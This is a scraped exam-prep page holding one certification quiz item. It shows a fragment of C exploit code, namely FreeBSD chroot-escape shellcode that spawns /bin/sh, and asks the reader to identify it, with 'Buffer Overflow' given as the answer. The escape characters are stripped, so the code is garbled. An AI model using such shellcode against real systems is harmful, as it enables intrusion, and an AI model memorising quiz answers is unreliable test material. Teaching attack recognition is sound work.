PrepAway - Latest Free Exam Questions & Answers

what kind of attack?

#define MAKE_STR_FROM_RET(x) ((x)&0xff), (((x)&0xff00)8),

(((x)&0xff0000)16), (((x)&0xff000000)24)

char infin_loop[]=

/* for testing purposes */

"xEBxFE";

char bsdcode[] =

/* Lam3rZ chroot() code rewritten for FreeBSD by venglin */

"x31xc0x50x50x50xb0x7excdx80x31xdbx31xc0x43"

"x43x53x4bx53x53xb0x5axcdx80xebx77x5ex31xc0"

"x8dx5ex01x88x46x04x66x68xffxffx01x53x53xb0"

"x88xcdx80x31xc0x8dx5ex01x53x53xb0x3dxcdx80"

"x31xc0x31xdbx8dx5ex08x89x43x02x31xc9xfexc9"

"x31xc0x8dx5ex08x53x53xb0x0cxcdx80xfexc9x75"

"xf1x31xc0x88x46x09x8dx5ex08x53x53xb0x3dxcd"

"x80xfex0exb0x30xfexc8x88x46x04x31xc0x88x46"

"x07x89x76x08x89x46x0cx89xf3x8dx4ex08x8dx56"

"x0cx52x51x53x53xb0x3bxcdx80x31xc0x31xdbx53"

"x53xb0x01xcdx80xe8x84xffxffxffxffx01xffxffx30"

"x62x69x6ex30x73x68x31x2ex2ex31x31x76x65x6e"

"x67x6cx69x6e";static int magic[MAX_MAGIC],magic_d[MAX_MAGIC];

static char *magic_str=NULL;

int before_len=0;

char *target=NULL, *username="user", *password=NULL;

struct targets getit;

The following exploit code is extracted from what kind of attack?

PrepAway - Latest Free Exam Questions & Answers

A.
Remote password cracking attack

B.
SQL Injection

C.
Distributed Denial of Service

D.
Cross Site Scripting

E.
Buffer Overflow

Explanation:
This is a buffer overflow with it’s payload in hex format.


Leave a Reply